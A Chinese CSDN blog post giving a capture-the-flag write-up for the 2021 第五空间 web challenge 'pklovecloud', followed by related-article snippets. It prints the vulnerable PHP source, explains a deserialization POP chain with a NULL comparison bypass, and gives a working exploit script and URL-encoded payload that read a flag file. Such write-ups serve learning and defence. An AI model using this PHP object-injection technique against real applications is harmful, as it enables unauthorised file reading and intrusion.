2021-第五空间智能安全大赛-Web-pklovecloud

最新推荐文章于 2024-06-04 17:26:02 发布
最新推荐文章于 2024-06-04 17:26:02 发布
阅读量3.3k 收藏 3
点赞数 3
文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53863234/article/details/121622314
版权 
<?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

打开后给出源码,显然考察反序列化。
前面都比较好直接构造,主要是如何绕过这里,因为这里不知道这个$heat等于多少

if($this->openstack->neutron === $this->openstack->nova)

这里可以使用NULL===NULL进行绕过
经过测试发现这里

$this->openstack = unserialize($this->docker);

当docker为空时,可以绕过。
测试如下:

<?php
error_reporting(0);
$b='';
var_dump(unserialize($b));
var_dump($b->a);
if($b->a===$b->b)
{
    echo 'cool';
}
else echo 'nono';
?>

在这里插入图片描述

构造exp:

<?php
class acp 
{   
    public $cinder;  
    public $neutron;
    public $nova;
}
class ace
{    
    public $filename;     
    public $openstack;
    public $docker;
}
$b=new acp;
$c=new ace;
$b->cinder=$c;
$c->docker='';
$c->filename='/flag.php';
echo urlencode(serialize($b));


payload:
?pks=O%3A3%3A%22acp%22%3A3%3A%7Bs%3A6%3A%22cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A9%3A%22%2Fflag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3Bs%3A0%3A%22%22%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

在源码发现flag在这里插入图片描述

可以看到这里写出了heat值,而且比较复杂,所以我们真正意义上来比较heat的值来比较绕过是不现实的.

早川秋zcq
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
NSSCTF (3)
qq_61988806的博客
05-11 547
我们打开js源码很明显这里当score大于60会出flag我们寻找到了getScore方法所在的地方之后发现他存在于Snake.prototype中再控制台中给getScore赋值再空格页面。
[第五空间 2021]pklovecloud 解题思路&过程
iamblackcat's blog
08-06 561
[第五空间 2021]pklovecloud 解题思路&过程
[第五空间 2021]WebFTP、[HCTF 2018]Warmup
最新发布
2401_82985722的博客
06-04 1088
/定义了一个名为emmm的类,在该类中有一个静态方法checkFile用于检查要包含的文件是否在白名单中,白名单是一个关联数组$whitelist,其中包含了允许包含的文件的键值对。//先使用mb_strpos函数找到$page中第一个问号的位置,然后使用mb_substr函数将问号之前的部分作为$_page进行处理。改了之后又提示 不是本地,添加xff(X-Forwarded-For:127.0.0.1)回显得到flag。跟上题一样,bp抓包发到重发器,回显后发现flag(base64解码)。
PHP反序列化&POP链的构造——2021第五空间CTF pklovecloud
iO快到碗里来
09-20 2699
网上关与PHP反序列化&POP链构造的文章有很多,笔者在这里简要讲解一下其相关知识。 0x01 序列化和反序列化 为方便存储和传输对象,将对象转化为字符串的操作叫做序列化( serialize() ),将所转化的字符串恢复成对象的过程叫做反序列化( unserialize() )。 举个栗子: <?php Class test{ public $a= '1'; public $bb= 2; public $ccc= True; } $r= new test(); ec
[第五空间 2021]pklovecloud
qq_73767109的博客
07-05 228
同一个类中的两个属性进行强比较,neutron有了赋值且赋值是$heat(整体没有出现)而nova又没有,这种情况下看着是无法相等的,但是这样可以利用null来进行比较,换句话说只要dokcer的类是null,哪无论怎么赋值结果都是null。而要利用到该函数就要大体上看如何构造pop链,可以看到是在rce类中的echo_name方法中,而唯一能调用这个方法的只有rcp类中的Tostring方法中,该方法。2.遇到受保护属性可以通过修改方法中的赋值来修改私有属性(很疑惑序列化后方法不是没了吗)
2021-第五空间智能安全大赛-Web-EasyCleanup
qq_53863234的博客
12-01 1612
打开后看到源码: <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GET['mode'] == "eval"){ $shell = $_GET['shell'] ?? 'phpinfo();'; if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell)
2021-01全国人工智能机器人大赛组织方案.pdf
11-25
"2021-01全国人工智能机器人大赛组织方案.pdf" 该文件是关于2021年全国人工智能机器人创新大赛的组织方案,旨在促进人工智能机器人的创新研发、科技转化、应用展示,激发创新意识、推动创新应用、培养创新人才,...
2021-2022收藏的精品资料2021-2022年餐饮店创业大赛计划书.doc
09-16
2021-2022收藏的精品资料
2021-2022年精品资料创新创业大赛总结报告.docx
10-02
2021-2022年的精品资料创新创业大赛是由经济管理学院主办,旨在响应国家对大学生创业的鼓励政策,帮助学生们打破传统就业模式,提升就业竞争力。 【大赛组织结构】 大赛分为赛前准备、初赛和决赛三个阶段。赛前...
2021-2022收藏的精品资料2021-2022年大学生创新创业大赛创业计划类模板概要.doc
09-16
2021-2022收藏的精品资料
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
2021-2022收藏的精品资料2021-2022年创业计划大赛策划书.doc
09-16
2021-2022年的湖南农业大学食品科学技术学院创业计划大赛以“创新成就梦想、创业成就未来”为主题,面向全校全日制本科生和研究生开放。大赛通过初赛、复赛、决赛三个阶段,选拔具有潜力的创业项目,为湖南省第六届...
[第五空间 2021]pklovecloud题解
qq_64222098的博客
05-07 187
在acp这个类里面,我们看到了_toString魔法方法,这个方法是当我们把一个对象当作函数调用时会被自动调用。并且_toString方法里还调用了echo_name()这个函数,这个函数恰巧就是我们先前找到的最终获得flag的地方。首先变量heat也是没有被赋值的,如果这时我们让变量nova的值也为空的话不久可以了嘛。这里我们就找到了这个链的终点,即我们可以通过这个file_get_contents函数来获得flag。知道了flag的位置了只需要把变量filename的值变一下就成功获得flag了。
[第五空间 2021]pklovecloud slackmoon的WriteUp
m0_61155226的博客
06-05 665
NSSCTF[第五空间 2021]pklovecloud
re学习笔记(66)第五空间智能安全大赛-re-nop
逆向随笔
06-25 660
打开老多花指令 挨个把这样的替换掉就好了 点击push的地址,ctrl+c复制。点击jmp ebp使用插件ctrl+alt+k修改,修改为jmp <复制的地址> 搜了一下字符串找到输出正确与否的代码,发现没有跳到Right的代码,,Right上面的那个jmp跳过了他,,, 刚开始以为是要修改main函数最底部栈顶的数值,让他等于Right的地址,然后pop ebx赋值给ebx,最后jmp ebx跳转到Right 调试了半天这里什么都没有! 整个main函数就是对表面上的,对输入的数Num+3
第五空间智能安全大赛-部分web
crispr的博客
07-10 524
第五空间智能安全大赛-部分web 转自i春秋 https://bbs.ichunqiu.com/thread-57773-1-1.html 适当洽一点小经费。。。 前言 这次的题目难度没有特别变态,但是也是充满挑战,打完一场比赛最重要的也是整理总结,因此有了今天的WP总结,也是记录自己学习的过程。由于题目环境部分没法复现,因此可能用到其他师傅的图,敬请谅解~ 正文 hate-php ​ 题目直接给的代码: <?php error_reporting(0); if(!isset($_GET['c
第五空间智能安全大赛-web部分writeup
Rainbow_Melo
06-26 1325
前两天和小伙伴打了个比赛,记录下(真菜。。) “第五空间智能安全大赛-web部分wphate-phpdo you konw hate-php 题目限制如下 if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me'); } 将基本的字符都过滤了,此时想到无字母取反webshell 写个取反脚本 #__coding:utf-8_
第五空间PKlovecloud题解
m0_74925562的博客
01-04 366
this->filename一眼丁真反序列化打开代码编辑器,我们需要构造pop链,来连接入口和出口,题目中我们需要拿flag,可以看到危险函数file_get_contents(),我们可以进行文件读取,我们来研究一下如何读取这里就上面两个魔术方法我们看下这段代码输出一个$logData,当我们传入一个对象时就会触发_tostring(),所以我们一开始传入acp(),可以看到危险函数在函数echo_name里,而_tostring里刚好有这个函数,所以我们给$cinder。
精品专题资料(2021-2022年收藏)基于单片机的智能家居系统.doc
11-29
精品专题资料(2021-2022年收藏)基于单片机的智能家居系统.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值